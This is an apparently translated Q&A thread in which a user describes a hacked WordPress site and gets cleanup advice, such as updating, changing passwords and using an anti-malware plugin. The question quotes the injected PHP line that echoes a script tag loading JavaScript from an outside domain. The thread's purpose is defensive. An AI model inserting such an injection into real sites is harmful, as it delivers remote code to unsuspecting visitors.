【问题标题】:My wordpress site was hacked [duplicate]我的wordpress网站被黑了[重复]
【发布时间】:2015-12-23 11:12:27
【问题描述】:

由于某种原因,我的网站被黑了。

我检查了我的 FTP 文件,发现 wp-blog-header.php 最近被修改了。

这是我的wp-blog-header.php 在被黑之前:

<?php  
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( !isset($wp_did_header) ) {

    $wp_did_header = true;

    require_once( dirname(__FILE__) . '/wp-load.php' );

    wp();

    require_once( ABSPATH . WPINC . '/template-loader.php' );

}

这是我被黑后的文件:

<?php echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>"; 
/**
 * Loads the WordPress environment and template.
...

所以,他们将这一行添加到我的文件中:

echo "<script type='text/javascript' src='http://www.oxxtm.com/images/wp-logo.js'></script>"; 

当我删除此行时,我的网站运行良好,但几个小时后他们又添加了此行。我检查了我的数据库行,但没有发现任何问题。 在我看来,这是一个新的失败。我昨天用谷歌搜索了它,我找不到太多,只有一些法国网站他们没有任何明确的解决这个问题的方法。那么,有没有人经历过呢?

这些是我在本网站中使用的插件及其各自的版本:

WordPress v4.1.8
Advanced Custom Fields v4.0.0

【问题讨论】:

  • 确保 wordpress 是最新的。更改所有密码。确认没有其他用户帐户具有您未配置的 FTP 访问权限。如果问题仍然存在,请与您的托管公司联系。
  • 您有备份吗?您是否托管在 Dreamhost 之类的共享托管网站上?如上所述,您很可能是后门程序 - 更改密码、擦除并重新安装(如果可能)并联系您的托管服务提供商。
  • WordPress 有一个关于如何处理被黑 WordPress 网站的详细常见问题解答。 codex.wordpress.org/FAQ_My_site_was_hacked

标签: wordpress


【解决方案1】:

使用一个插件 Anti-Malware GOTMLS.NET https://wordpress.org/plugins/gotmls/ 它已经为我们解决了完全相同的问题,到目前为止一切顺利,差不多 24 小时,脚本还没有被看到。

【讨论】:

    【解决方案2】:

    我也遇到了。幸运的是,我刚刚安装了一个安全插件,它提醒我有一个我知道未经授权的登录,我现在正在调查,并将再次在这里更新。

    【讨论】:

    • 更新,原来这与登录漏洞无关,我的根目录中有超过 50 个额外的文件夹,这一切都发生在我注意到标题中的 JS 之前的一周左右。跨度>
    猜你喜欢
    • 1970-01-01
    • 1970-01-01
    • 2018-08-27
    • 1970-01-01
    • 1970-01-01
    • 1970-01-01
    • 2019-01-06
    相关资源
    最近更新 更多